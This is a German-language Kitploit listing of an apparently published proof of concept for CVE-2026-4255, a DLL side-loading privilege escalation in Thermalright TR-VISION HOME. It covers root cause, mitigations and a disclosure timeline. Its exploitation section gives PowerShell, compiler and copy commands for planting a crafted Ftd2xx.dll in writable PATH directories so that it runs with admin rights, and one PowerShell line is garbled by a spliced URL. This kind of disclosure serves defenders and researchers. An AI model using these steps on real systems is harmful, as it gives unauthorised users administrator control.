Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-4255 — Proof-of-Concept für CVE-2026-4255: DLL-Side-Loading-Privilege-Escalation in Thermalright TR-VISION HOME über PATH-Directory-Planting, mit vollständiger Ursachenanalyse und Anleitung zur Risikominderung. | Kitploit
Tools/GitHubGitHub/ard33/cve-2026-4255
Privilege EscalationSchwachstellenanalyseExploitationPapers & ForschungLernen & BildungBinary-ExploitationLabs & Praxis
GitHubard33/cve-2026-4255

CVE-2026-4255

Proof-of-Concept für CVE-2026-4255: DLL-Side-Loading-Privilege-Escalation in Thermalright TR-VISION HOME über PATH-Directory-Planting, mit vollständiger Ursachenanalyse und Anleitung zur Risikominderung.

Repository anzeigen
1vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-4255 Thermalright TR-VISION HOME DLL Side-Loading Privilegienerweiterung

Schweregrad: HOCH (CVSS 8.4)
CWE: CWE-829 Einbindung von Funktionalität aus einer nicht vertrauenswürdigen Kontrollsphäre
Veröffentlicht: 16/03/2026
CNA: Toreon
Betroffene Versionen: Thermalright TR-VISION HOME ≤ 2.0.5 (Windows 64-Bit)
Entdeckt von: Ard33


Beschreibung

Thermalright TR-VISION HOME lädt Ftd2xx.dll (FTDI USB-zu-seriell Bibliothek) unter Verwendung der standardmäßigen Windows-DLL-Suchreihenfolge. Diese Reihenfolge enthält benutzerbeschreibbare Verzeichnisse vor geschützten Systempositionen. Da TR-VISION HOME immer mit Administratorrechten ausgeführt wird und keine Integritäts- oder Signaturprüfung geladener Bibliotheken durchführt, kann ein Angreifer, der in ein beliebiges Verzeichnis auf dem PATH schreiben kann, eine präparierte Ftd2xx.dll platzieren und diese beim nächsten Start der Anwendung mit erhöhten Rechten laden.

Zum Platzieren der DLL sind keine Administratorrechte erforderlich. Ein Benutzer mit niedrigen Berechtigungen kann dies gegenüber jedem Benutzer ausnutzen, der anschließend TR-VISION HOME mit erhöhten Rechten startet.

CVSS 4.0 Vektor

root@kitploit:~
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
MetrikWert
AngriffsvektorLokal
AngriffskomplexitätNiedrig
AngriffsanforderungenKeine

Grundursache

Die Anwendung ruft LoadLibrary("Ftd2xx.dll") auf (oder importiert sie implizit beim Laden), ohne einen vollständig qualifizierten Pfad anzugeben. Windows löst die Bibliothek auf, indem es die in MSDN Dynamic-Link Library Search Order definierte Suchreihenfolge durchläuft:

  1. Das Verzeichnis, aus dem die Anwendung geladen wurde
  2. Das Systemverzeichnis (C:\Windows\System32)
  3. Das 16-Bit-Systemverzeichnis
  4. Das Windows-Verzeichnis
  5. Das aktuelle Arbeitsverzeichnis
  6. Verzeichnisse, die in der Umgebungsvariable PATH aufgeführt sind ← ausnutzbar

Ein Angreifer platziert Ftd2xx.dll in einem benutzerbeschreibbaren Verzeichnis, das vor System32 in PATH erscheint. C:\Users\<User>\.local\bin) ist ein solches Verzeichnis und standardmäßig in PATH vorhanden, was es zu einem zuverlässigen Ablageort macht.


Betroffene Software

SoftwareVersionPlattform
Thermalright TR-VISION HOME≤ 2.0.5Windows x64

Getestet auf TR-VISION HOME 2.0.5 unter Windows 11.


Proof of Concept

Voraussetzungen

  • Ein beliebiges standardmäßiges Windows-Benutzerkonto (keine Administratorrechte zum Platzieren der DLL erforderlich)
  • Ein benutzerbeschreibbares Verzeichnis, das in %PATH% vorhanden ist
  • Der Zielbenutzer muss TR-VISION HOME starten (es fordert beim Start über UAC erhöhte Rechte an)

Schritte

1. Ein beschreibbares PATH-Verzeichnis identifizieren

root@kitploit:~
$env:PATH -split ';' | Where-Object {
    if (-not $_ -or -not (Test-Path $_)) { return $false }
    try {
        $t = Join-Path $_ '.wrtest'
        [System.IO.File]:https://raw.githubusercontent.com/ard33/cve-2026-4255/HEAD/:Create($t).Close()
        Remove-Item $t -Force
        $true
    } catch { $false }
}

Ein zuverlässiger Standard: C:\Users\<User>\.local\bin

2. Die PoC-DLL kompilieren

MinGW (Cross oder nativ):

root@kitploit:~
gcc -shared -o Ftd2xx.dll poc/Ftd2xx.c -Wl,--out-implib,Ftd2xx.lib

MSVC:

root@kitploit:~
cl /LD poc\Ftd2xx.c /Fe:Ftd2xx.dll

3. Die DLL platzieren

Wählen Sie ein beliebiges beschreibbares Verzeichnis aus Schritt 1. Zwei häufige Standardverzeichnisse:

root@kitploit:~
:: uv / pipx default scripts directory
copy Ftd2xx.dll "C:\Users\<victim>\.local\bin\Ftd2xx.dll"

:: Python Launcher (standard Python install)
copy Ftd2xx.dll "C:\Users\<victim>\AppData\Local\Programs\Python\Launcher\Ftd2xx.dll"

Für diesen Schritt sind keine erhöhten Rechte erforderlich.

4. Auslösen

Das Opfer startet TR-VISION HOME (z. B. aus dem Startmenü oder der Taskleiste). Die UAC-Eingabeaufforderung führt die Anwendung mit Administratorrechten aus. Während der Initialisierung wird Ftd2xx.dll über die Suchreihenfolge aufgelöst, die platzierte Kopie wird vor System32 gefunden, und die DllMain des Angreifers wird innerhalb des erhöhten Prozesses ausgeführt.

5. Erwartetes Ergebnis

  • Ein Popup erscheint, das bestätigt, dass die DLL innerhalb des erhöhten Prozesses geladen wurde
  • C:\Users\Public\CVE-2026-4255_pwned.txt wird erstellt, mit folgendem Inhalt:
    • Prozess-ID von TR-VISION HOME
    • Bestätigung, dass TokenIsElevated = YES ist

Screenshot-Nachweise

Procmon zeigt TR-VISION HOME (PID 78940) bei der Suche nach Ftd2xx.dll über PATH-Verzeichnisse – alle geben NAME NOT FOUND zurück, bis die platzierte Kopie aufgelöst wird:

Procmon-Ablaufverfolgung

Ftd2xx.dll platziert in AppData\Local\Programs\Python\Launcher\ (Datum 26.12.2025 — Tag der Entdeckung):

Platzierte DLL im Python Launcher

Erhöhte cmd-Shell, die von der geladenen DLL gestartet wurde – Titelleiste bestätigt Administratorkontext:

Nachweis einer erhöhten Shell

TR-VISION HOME Version 2.0.5:

Version


Entschärfung

Für Thermalright:

  1. Laden Sie Ftd2xx.dll zur Laufzeit mit einem vollständig qualifizierten Pfad:
    root@kitploit:~
    LoadLibraryExA("C:\\Windows\\System32\\Ftd2xx.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
    
  2. Verwenden Sie die Flags LOAD_LIBRARY_SEARCH_SYSTEM32 oder LOAD_LIBRARY_SEARCH_APPLICATION_DIR mit LoadLibraryEx.
  3. Überprüfen Sie die digitale Signatur geladener Bibliotheken über WinVerifyTrust.
  4. Aktivieren Sie den sicheren DLL-Suchmodus (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode = 1), obwohl dies PATH-basiertes Planting nicht vollständig entschärft.

Für Benutzer (vorübergehend):

  • Platzieren Sie die legitime Ftd2xx.dll (aus dem FTDI D2XX-Treiberpaket) direkt im Installationsverzeichnis von TR-VISION HOME (z. B. C:\Program Files\TR-VISION HOME\). Das Anwendungsverzeichnis wird als erstes durchsucht, daher hat eine legitime Kopie dort Vorrang vor jedem PATH-basierten Planting.
  • Führen Sie TR-VISION HOME nicht aus, bis eine gepatchte Version verfügbar ist.

Zeitleiste

DatumEreignis
26/12/2025Schwachstelle entdeckt
27/12/2025Hersteller (Thermalright) über Support-Kanäle kontaktiert
16/03/2026Öffentliche Offenlegung CVE-2026-4255 von Toreon CNA zugewiesen

Referenzen

  • NVD CVE-2026-4255
  • CWE-829 Einbindung von Funktionalität aus einer nicht vertrauenswürdigen Kontrollsphäre
  • MSDN DLL-Suchreihenfolge
  • FTDI Ftd2xx-Treiber
  • Thermalright TR-VISION HOME

Haftungsausschluss

Dieses Proof-of-Concept wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Die PoC-Nutzlast ist absichtlich harmlos – sie schreibt eine Textdatei und zeigt ein Meldungsfenster. Verwenden Sie es nur gegen Systeme, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben. Der Autor übernimmt keine Verantwortung für Missbrauch.

Tool herunterladen
Erforderliche Privilegien
Keine
BenutzerinteraktionAktiv (Opfer startet App)